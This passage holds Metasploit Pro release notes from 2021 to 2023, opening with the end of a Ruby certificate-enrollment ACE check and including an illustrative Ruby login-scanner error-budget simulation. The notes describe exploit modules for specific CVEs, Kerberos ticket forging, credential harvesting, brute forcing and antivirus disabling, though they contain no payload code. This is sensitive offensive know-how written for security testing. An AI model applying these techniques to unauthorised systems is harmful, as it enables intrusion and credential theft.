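SAMPLE_ACES = [
  # Domain Users: control access with no object type, so every extended right is granted
  Ace.new(sid: 'S-1-5-21-1111-2222-3333-513', access_mask: ADS_RIGHT_DS_CONTROL_ACCESS, object_type: nil),
  # Domain Admins: explicit Certificate-Enrollment right (GUID case varies between tools)
  Ace.new(sid: 'S-1-5-21-1111-2222-3333-512', access_mask: ADS_RIGHT_DS_CONTROL_ACCESS,
          object_type: CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT.upcase),
  # Authenticated Users: control access, but only for an unrelated extended right
  Ace.new(sid: 'S-1-5-11', access_mask: ADS_RIGHT_DS_CONTROL_ACCESS,
          object_type: 'ab721a53-1e2f-11d0-9819-00aa0040529b'),
  # Everyone: read rights only, control access bit not set
  Ace.new(sid: 'S-1-1-0', access_mask: 0x20094, object_type: nil)
].freeze

if $PROGRAM_NAME == __FILE__
  puts "fixed rule: #{enrollment_sids(SAMPLE_ACES).join(', ')}"
  puts "old rule:   #{enrollment_sids(SAMPLE_ACES, rule: method(:grants_enrollment_old?)).join(', ')}"
end
```

Run stand-alone, the fixed rule lists both Domain Users and Domain Admins, while the old rule lists only Domain Admins and would have missed the Domain Users grant that makes the template broadly enrollable.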

New in Metasploit Pro 4.22.0 (April 11, 2023) (Apr 12, 2023)

  • Improved:
  • Pro: We added a warning to the report configuration view when a project does not contain the required data to generate a selected report.
  • Pro: Improved project members section of settings page.
  • PR 17458 - Updates the exploit/multi/misc/weblogic_deserialize_badattrval module to enable support for SSL/TLS.
  • PR 17724 - Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations.
  • PR 17753 - Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal.
  • PR 17789 - This PR adds enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
  • PR 17813 - This sets the CHECK_FALSE option to true by default so that the auxiliary/scanner/ssh/ssh_enumusers scanner module will bail upon detecting false positive results.
  • PR 17833 - Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method.
  • Fixed:
  • Pro: We improved task chain cloning to support when the original creator's user no longer exists.
  • PR 17704 - Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
  • PR 17778 - Updates the Metasploit database migration code to no longer break the test suite when running locally.
  • PR 17808 - Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine - a digital archive of the world wide web founded by the Internet Archive.
  • PR 17818 - This PR fixes a crash in the RPC job info command.
  • PR 17823 - This fixes an issue in the check method where targets with files containing no PHP code were falsely reported as safe.
  • PR 17825 - Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module.
  • PR 17830 - Fixes a crash when parsing dates in ./tools/modules/committer_count.rb.
  • PR 17831 - Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module.
  • PR 17835 - Fixes a bug in auxiliary/admin/networking/cisco_dcnm_auth_bypass where the bypass_auth method would break if a user supplied a TARGETURI path without a trailing /.
  • PR 17844 - Fixes broken documentation references in the secretsdump, zemra_panel_rce, and windows/gather/credentials/skype modules.
  • Modules:
  • PR 17785 - This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.
  • PR 17806 - This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.
  • PR 17826 - This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 22H2.
  • PR 17827 - This adds a scanner module that extracts version information from AMQP protocol servers.
  • PR 17828 - This adds a login scanner module for AMQP services.

New in Metasploit Pro 4.22.0 (March 27, 2023) (Mar 31, 2023)

  • Improved:
  • Pro: Improved errors on web terminal view when a session is disconnected.
  • PR 17401 - This PR adds a new x86 XOR polymorphic encoder.
  • PR 17583 - Enhances msfconsole's info -d command, which is used to generate browser Metasploit module documentation, to additionally include references to AttackerKB.
  • Fixed:
  • Pro: We improved import of credential files with NTLMHash values to ensure modules will identify entries in the expected format.
  • PR 17735 - Fixes a few incorrect parameter names in the generated developer documentation found at https://docs.metasploit.com/api/.
  • PR 17747 - Updates the wmap plugin to no longer crash when running wmap_targets -t http://metasploit.com.
  • PR 17783 - An update has been made to the reload_lib command so that it continues to reload files even if a single file fails to load.
  • PR 17784 - Reduces the number of files loaded when msfconsole starts up. This was a performance regression introduced by a recent Rails upgrade.
  • PR 17792 - Fixes a crash in external modules when running the auxiliary/scanner/wproxy/att_open_proxy module.
  • PR 17794 - Updates external modules to support Python 3.11.
  • PR 17798 - The debug --datastore command was previously causing a stacktrace due to some incorrect operations. These have since been fixed so that users can now use debug --datastore to output debug information along with the datastore information.
  • PR 17802 - Updates Python pingback payloads such as payload/python/pingback_reverse_tcp to no longer crash when viewing info or generating.
  • Modules:
  • PR 17388 - This PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
  • PR 17462 - This adds a post module that collects and decrypts credentials from WhatsUp Gold installs.
  • PR 17509 - This PR adds an exploit that targets a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8.
  • PR 17750 - A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC's keyUpload.jsp page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the root user, giving full control over the target device.
  • PR 17754 - This adds an exploit module for CVE-2022-24637, a single/double quote confusion vulnerability in Open Web Analytics versions below 1.7.4. This leads to the disclosure of sensitive information in an automatically generated PHP cache file, which can be leveraged to gain admin privileges and remote code execution.
  • PR 17771 - This adds a module that exploits an unauthenticated file upload vulnerability in various versions of Monitorr. RCE as the user under which the software runs can be achieved due to insufficient validation on GIF uploads.
  • PR 17775 - This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing Bitbucket application into generating a diff. This module requires at least admin credentials.

New in Metasploit Pro 4.22.0 (March 14, 2023) (Mar 15, 2023)

  • Improved:
  • Pro: We enhanced timeout handling for active auxiliary modules to log errors more gracefully.
  • Pro: Improved generation of reference links shown in module details and reports.
  • PR 17635 - Updates the admin/kerberos/inspect_ticket module to display the ticket checksum and full PAC checksum.
  • PR 17675 - Updates the admin/kerberos/forge_ticket to support a new extra_sids option which can be useful for including cross-domain SIDs for forging external Kerberos trust tickets as part of cross-trust domain escalation. The admin/kerberos/inspect_ticket has also been updated to support viewing these extra sid values.
  • PR 17686 - This adds 3 additional methods to the existing PetitPotam module to make it work even if the patch for CVE-2021-36942 has been installed. Note that it won't work after the December 2021 patch.
  • PR 17699 - This adds SCHANNEL authentication support to LDAP modules.
  • PR 17715 - The Metasploit Payload gem has been bumped to 2.0.115, bringing in support for the arp command to Python Meterpreter on Linux, and adding support for displaying IPv6 routing tables using the route command on Windows.
  • PR 17727 - Two new options have been added to the login scanner library: max_consecutive_error_count and max_error_count. These options allow users to set the maximum number of errors that are allowed to occur when connecting as well as the maximum number of consecutive errors that are allowed when connecting before the login scanner will give up on a target.
  • PR 17744 - The code for msfconsole has been updated so that performance profiling can also take into account the time it takes to load msfenv and console related libraries, thereby allowing for more accurate performance profiling.
  • PR 17745 - This updates the metasploit-payloads gem to pull in changes to the Python Meterpreter on Windows to add the route add and delete functionality as well as process information.
  • PR 17746 - The data/wordlists/password.lst password list has been updated to include the master password that LastPass suggests as an example when a user goes to create a new master password, r50$K28vaIFiYxaY, into the password list, as well as to fix some encoding issues.
  • PR 17749 - Updates the auxiliary/admin/kerberos/keytab.rb module to additionally export any NTHASHES, which can be useful for decrypting Kerberos network traffic in wireshark.
  • PR 17756 - Updates secrets dump to generate the Kerberos rc4 key for the machine account.
  • PR 17757 - Updates the formatting logic for info command to improve the readability of the module description. Previously, the module description was squashed into a single line, but now each paragraph and bullet list etc will be rendered on their own new lines.
  • Fixed:
  • Pro: Improved enforcement of SSL settings for globally configured SMTP.
  • PR 17562 - This fixes some incorrect Railgun definitions for the wldap32 Windows library.
  • PR 17673 - lib/msf/core/payload/apk.rb has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum apktool version to 2.4.1 and makes it so that versions prior to 2.7.0 of apktool will throw a warning about being potentially out of date.
  • PR 17679 - This PR fixes the broken payload selection for Metasploit RPC.
  • PR 17696 - The version of Metasploit Payloads in use by Metasploit has been bumped, which brings in support for the getprivs and getdesktop commands to Python Meterpreters running on Windows, and also adds support for getting the handle of processes opened via the session. Additionally, fixes were made to support Python 2.5 and to fix the getdesktop output of Python Meterpreters.
  • PR 17697 - This updates the exploit/linux/http/froxlor_log_path_rce module to note that Froxlor 2.0.7 is the last vulnerable version.
  • PR 17700 - The argument validation for the route command has been reworked to improve the way it validates arguments and to print out more accurate error messages.
  • PR 17716 - A bug has been fixed whereby the reverse port forward information message was displayed incorrectly, and the same information was shown on both the local and remote parts of the message.
  • PR 17721 - This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.
  • PR 17723 - A bug has been fixed in the modules/encoders/php/base64.rb encoder whereby strings were being passed as literal strings without being properly quoted, which could result in errors on newer versions of PHP.
  • PR 17726 - The Metasploit Payloads gem has been updated bringing in initial support for attaching to processes on Python Meterpreter shells on Windows, a bug fix for the route command on newer versions of Windows on Windows Meterpreter, and a fix so that both C Meterpreter and Python Meterpreter sessions will attempt to enable the same set of permissions when running getprivs.
  • PR 17729 - Fixes an edge case crash when running Ruby 3.2.
  • PR 17738 - Fix Ruby 3.2 crash when running certain tools.
  • PR 17758 - The metasploit-payloads gem has been bumped to fix a token handle leak that was causing Python Meterpreters to leave dangling handles after using getprivs, fix an error in packet_transmit_http whereby error codes were not appropriately returned, and update the arp command to properly return the interface name instead of the index for the Interface column.
  • PR 17774 - A bug has been fixed when displaying the Metasploit banner due to use of an undefined function; this has been updated to use the proper function.
  • Modules:
  • PR 17507 - A module has been added which exploits CVE-2023-22952, an RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically www-data.
  • PR 17624 - This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, which results in remote code execution.
  • PR 17638 - This adds a module to execute code using Lucee's scheduled job functionality. The feature requires authentication by default and allows a ColdFusion page to be rendered which is used to execute an OS command using the cfexecute directive. The module works on both Linux and Windows targets.
  • PR 17672 - This PR includes a post module that will disable ClamAV on Linux systems.
  • PR 17676 - This adds a login module for the Softing Secure Integration Server software.
  • PR 17733 - This adds a login scanner module to brute force credentials of Wowza Streaming Engine Manager.
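The following Ruby is an added example of how the two error budgets introduced in the PR 17727 entry above interact; it is illustrative code, not Metasploit's own LoginScanner library. max_error_count caps the total number of connection errors seen for a target, while max_consecutive_error_count caps errors in a row; any answer from the service, including a rejected credential, resets the consecutive counter but not the total. The target behaviour, the credential list and the option defaults are all constructed for the example.

```ruby
# Outcome of one login attempt against the target:
#   :success -> valid credential, :failed -> rejected credential,
#   :error   -> connection-level problem (timeout, reset, ...).
class ErrorBudgetScanner
  attr_reader :results, :stop_reason

  # attempt: callable taking "user:pass" and returning one of the outcomes above.
  # Defaults here are arbitrary for the example, not Metasploit's defaults.
  def initialize(attempt, max_error_count: 3, max_consecutive_error_count: 2)
    @attempt = attempt
    @max_error_count = max_error_count
    @max_consecutive_error_count = max_consecutive_error_count
    @results = []
    @stop_reason = nil
  end

  def run(credentials)
    total_errors = 0
    consecutive_errors = 0

    credentials.each do |cred|
      outcome = @attempt.call(cred)
      @results << [cred, outcome]

      if outcome == :error
        total_errors += 1
        consecutive_errors += 1
      else
        # Any reply from the service, even a rejected login, breaks the streak.
        consecutive_errors = 0
      end

      if consecutive_errors >= @max_consecutive_error_count
        @stop_reason = :too_many_consecutive_errors # target looks down
        break
      elsif total_errors >= @max_error_count
        @stop_reason = :too_many_errors # target is too flaky to trust results
        break
      end
    end
    self
  end

  def successes
    results.select { |_, outcome| outcome == :success }.map(&:first)
  end
end

# Constructed target: answers with a connection error on the listed attempt
# numbers and otherwise accepts exactly one (fictional) credential.
def fake_target(error_on_attempts, valid: 'admin:Winter2023!')
  attempts = 0
  lambda do |cred|
    attempts += 1
    next :error if error_on_attempts.include?(attempts)

    cred == valid ? :success : :failed
  end
end

CREDENTIALS = %w[admin:admin admin:password root:toor admin:Winter2023! guest:guest].freeze

if $PROGRAM_NAME == __FILE__
  flaky = ErrorBudgetScanner.new(fake_target([1, 3, 5])).run(CREDENTIALS)
  puts "flaky target: stopped for #{flaky.stop_reason.inspect}, found #{flaky.successes.inspect}"
  down = ErrorBudgetScanner.new(fake_target([1, 2])).run(CREDENTIALS)
  puts "down target:  stopped for #{down.stop_reason.inspect} after #{down.results.length} attempts"
end
```

The flaky target errors on attempts 1, 3 and 5: the consecutive budget is never exhausted because successes and failures sit between the errors, but the total budget of 3 is, so the scan stops after the fifth attempt having still recovered the valid credential. The down target errors twice in a row and is abandoned after two attempts without the rest of the credential list being burnt against it.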

New in Metasploit Pro 4.22.0 (February 27, 2023) (Mar 1, 2023)

  • Improved:
  • Pro: We improved the task log detail page to only offer cleanup tasks when applicable such as when there is a session.
  • The DLL template code has been updated so that tools such as msfvenom can use DLL templates with payloads that were larger than 4096 bytes, such as unstaged payloads. Note that this update only applies to the default DLL templates that Metasploit provides, and not to external DLL templates which are restricted to 4096 bytes at this time.
  • Updates the script/resource/basic_discovery.rc script to better detect when the Metasploit database is not connected as well as improving error output.
  • Fixed:
  • Pro: We improved the consistency of dates and times throughout reports.
  • Fixes a bug that caused warnings to be output on Arch Linux environments when starting msfconsole.
  • Updates the script/resource/basic_discovery.rc script to support commas in RHOST values.
  • This updates the location of where registry hives are temporarily stored by the windows_secrets_dump module.
  • This fixes an issue where action names were being treated as case sensitive.
  • Modules:
  • An exploit for Cisco RV160, RV260, RV340 and RV345 Small Business Routers prior to firmware version 1.0.03.26 has been added which exploits CVE-2022-20705, an authentication bypass, and CVE-2022-20707, a command injection vulnerability, to achieve remote code execution as the www-data user on affected devices as an unauthenticated attacker.
  • This module exploits a vulnerability in various versions of Froxlor that allows an authenticated user to change the default log file to an arbitrary path on the system. Using this, an authenticated user can write a Twig template, that when rendered, will execute arbitrary code and grant a shell or meterpreter session as the www-data user.
  • This adds an exploit for CVE-2023-0297 which is an unauthenticated Javascript injection in pyLoad's Click 'N' Load service.

New in Metasploit Pro 4.22.0 (January 30, 2023) (Feb 1, 2023)

  • Improved:
  • Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
  • Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
  • PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
  • PR 16689 - Adds support for host addresses in kerberos tickets.
  • PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
  • PR 16749 - Adds Kerberos Authentication support to WinRM modules.
  • PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
  • PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
  • PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
  • PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
  • PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
  • PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
  • PR 17374 - Adds klist command support to list Kerberos tickets in the database.
  • PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
  • PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
  • PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
  • PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
  • PR 17475 - Enables the datastore_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
  • PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
  • PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
  • PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
  • PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
  • PR 17535 - This adds NTLM hash recovery to the kerberos/get_ticket module.
  • PR 17539 - Adds additional error handling for Kerberos error codes.
  • Fixed:
  • Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
  • Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
  • PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
  • PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
  • PR 17482 - Fixes a connection issue with reverse_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
  • PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
  • PR 17497 - This fixes an error where modules that issue certificates (icpr_cert and now auxiliary/admin/dcerpc/cve_2022_26923_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
  • PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
  • PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
  • PR 17541 - Fixes a crash that occurs when domain option is set to blank.
  • PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
  • Modules:
  • PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require pre-authentication, i.e. AS-REP Roastable accounts, will have their hashes output for offline cracking.
  • PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
  • PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
  • PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
  • PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
  • PR 17533 - Enhances the auxiliary/admin/kerberos/get_ticket module with PKINIT functionality.

New in Metasploit Pro 4.21.1 July 1 (Jul 8, 2022)

  • Improved:
  • Pro: We updated the backups table so users can download them only when a backup is complete to avoid partial downloads.
  • PR 16721 - This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.
  • Fixed:
  • PR 16722 - Fixes module metadata for stability and reliability.
  • PR 16729 - Fixes a crash in Metasploit's console when trying to render tables which contain unsupported characters.
  • Modules:
  • PR 16677 - This adds an auxiliary module that can be used to add, lookup, and delete computer accounts from an active directory domain. The computer account can offer a sort of foothold into the domain for lateral movements or as a common attack primitive.

New in Metasploit Pro 4.21.1 June 24 (Jun 28, 2022)

  • We improved support for non UTF-8 OS installs, and platform independent restore of backups

New in Metasploit Pro 4.21.0 May 9 (May 12, 2022)

  • Upgrades Metasploit Framework to 6.1.41

New in Metasploit Pro 4.21.0 April 26 (Apr 28, 2022)

  • We updated support for 'Debug' payloads and fixed worker service stability that was impacting backup and reporting functionality

New in Metasploit Pro 4.21.0 April 13 (Apr 18, 2022)

  • Improved:
  • Pro: We expanded the error messages that return when duplicate emails are added to social engineering target lists with conflicting user detail.
  • PR 15972 - This updates the log4shell scanner with the LEAK_PARAMS option, which provides a way to leak more target information such as environment variables.
  • PR 16320 - This updates Windows Meterpreter payloads to support a new MeterpreterDebugBuild datastore option. When set to true the generated payload will have additional logging support which is visible via the Windows DbgView program.
  • PR 16373 - This adds initial support for ruby 3.1.
  • PR 16403 - This adds more checks to the post/windows/gather/checkvm module to better detect if the current target is a Qemu / KVM virtual machine.
  • Fixed:
  • PR 16364 - This adds a fix for a crash in auxiliary/spoof/dns/native_spoofer as well as documentation for the module.
  • PR 16386 - This ensures Exploit::Remote::SocketServer does not call the associated Rex::ServiceManager service wait method if the service has already stopped.
  • PR 16398 - A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of rspec checks.
  • PR 16408 - This fixes an edgecase with the multi/postgres/postgres_copy_from_program_cmd_exec module, which would crash when a randomly generated table name started with a number.
  • PR 16419 - A bug has been fixed whereby using the search command with a disclosure_date filter would show the help menu instead of results. This has been fixed by improving the date handling logic for the search command.
  • Modules:
  • PR 16082 - This updates the shadow_mitm_dispatcher module by adding a new RubySMB Dispatcher. This allows a better integration with RubySMB and enables the use of all the features provided by its client. Also, both SMBv2 and SMBv3 are now supported.
  • PR 16381 - This adds a post module that enumerates applications installed with Chocolatey on Windows systems.
  • PR 16382 - This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user's credentials, to execute code as NT AUTHORITY\SYSTEM. The PromptOnSecureDesktop setting must also be set to 1 on the affected machine for this exploit to work, which is the default setting.
  • PR 16395 - This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to 3.1.7 and 3.2.3.
  • PR 16399 - A new module has been added that exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.
  • PR 16401 - This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we've introduced a new CVE option to select which CVE to exploit. The default is the most recent CVE.

New in Metasploit Pro 4.20.0 November 10 (Nov 11, 2021)

  • Improved:
  • PR 15665 - This adds additional metadata to exploit modules to specify Meterpreter command requirements. Metadata information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.
  • PR 15681 - This adds support for reverse port forwarding via established SSH sessions.
  • PR 15778 - This adds documentation for the http trace scanner.
  • PR 15782 - This updates the iis_internal_ip module to include coverage for the PROPFIND internal IP address disclosure as described by CVE-2002-0422.
  • PR 15788 - When a generated Powershell command payload exceeds the maximum length allowed to successfully execute, it will now gracefully fall back to omitting an AMSI bypass.
  • PR 15803 - This adds f5_bigip_virtual_server scanner documentation.
  • Fixed:
  • Pro: Scheduled tasks will now report accurate next start times for different user timezones.
  • PR 15799 - This fixes a crash in the iis_internal_ip module.
  • PR 15805 - This bumps the metasploit-payloads version to include two bug fixes for the Python Meterpreter.
  • Modules:
  • PR 15558 - This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.
  • PR 15754 - This adds a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled and can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
  • PR 15756 - This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
  • PR 15761 - This exploits an authentication bypass which leads to arbitrary code execution in versions 3.7.1.4 and below of the WordPress plugin pie-register. Supplying a valid admin ID to the user_id_social_site parameter in a POST request returns a valid session cookie. Using that session cookie a PHP payload is uploaded as a plugin then requested, resulting in code execution.
  • PR 15765 - This adds an auxiliary module that leverages an information disclosure vulnerability in the BulletproofSecurity plugin for Wordpress. This vulnerability is identified as CVE-2021-39327. The module retrieves a publicly accessible backup file and extracts user credentials from the database backup.
  • PR 15783 - This adds an exploit for CVE-2020-25223. CVE-2020-25223 is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation of CVE-2020-25223 results in OS command execution as the root user.
  • PR 15800 - This adds a remote exploit for Microsoft OMI "OMIGOD" CVE-2021-38647.
  • PR 15816 - This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. These vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.

New in Metasploit Pro 4.19.1 July 08 (Aug 4, 2021)

  • Improved:
  • PR 15358 - This updates the exploit/multi/ssh/sshexec module to now account for cases where the target system does not have the python binary. Using the new binary_exists() class method in lib/msf/base/sessions/command_shell.rb, the module now checks for and uses the valid Python binary found on the target system despite not having a fully-established session.
  • PR 15363 - Enhances the auxiliary/scanner/ipmi/ipmi_dumphashes module to have SESSION_RETRY_DELAY and SESSION_MAX_ATTEMPTS options.
  • PR 15366 - This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).
  • Fixed:
  • Pro: We have updated the logo on the default Social Engineering redirect template with the latest public location.
  • PR 15320 - A bug has been fixed in the read_file method of lib/msf/core/post/file.rb that prevented PowerShell sessions from being able to use the read_file() method. PowerShell sessions should now be able to use this method to read files from the target system.
  • PR 15350 - Fixes a regression issue in the windows/manage/shellcode_inject module which crashed due to a missing mixin.
  • PR 15352 - Fixes an issue where running msfdb init on an already initialised database would generate a new password instead of just starting the database.
  • PR 15371 - This fixes an issue in the apport_abrt_chroot_priv_esc module where if the apport-cli binary was not in the PATH the check method would fail.
  • Modules:
  • PR 15107 - This adds an exploit for CVE-2019-5736 which is a flaw in Docker that can be leveraged by an attacker to overwrite the runc binary in the host and escape from a container.
  • PR 15282 - This adds a module that leverages CVE-2019-15975 which is an authentication bypass in Cisco's DCNM platform. The module will leverage the vulnerability to add a new administrative user account with known credentials that can be used to access the system.
  • PR 15318 - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and the ExternalScripts feature enabled, gains a SYSTEM shell.
  • PR 15333 - This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.
  • PR 15341 - This adds an exploit module that targets versions >= v7.0.0 and <= v7.0.4 of the Wordpress plugin, wpDiscuz. An unauthenticated user has the ability to upload arbitrary files as image attachments through the wpDiscuz plugin due to the PHP functions used to process the attachments. Once uploaded, unauthenticated code execution is achieved by requesting the path of the file uploaded.
  • PR 15349 - This adds an exploit module for rConfig versions <= 3.9.6. An arbitrary file upload vulnerability exists in lib/crud/vendors.crud.php through the vendorLogo parameter. The functionality for uploading vendor logos does not validate the contents of uploaded files, so an authenticated user has the capability of uploading arbitrary php code. Once uploaded, code execution on the server can be achieved by requesting the uploaded php file in the images/vendor path.
  • PR 15385 - A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.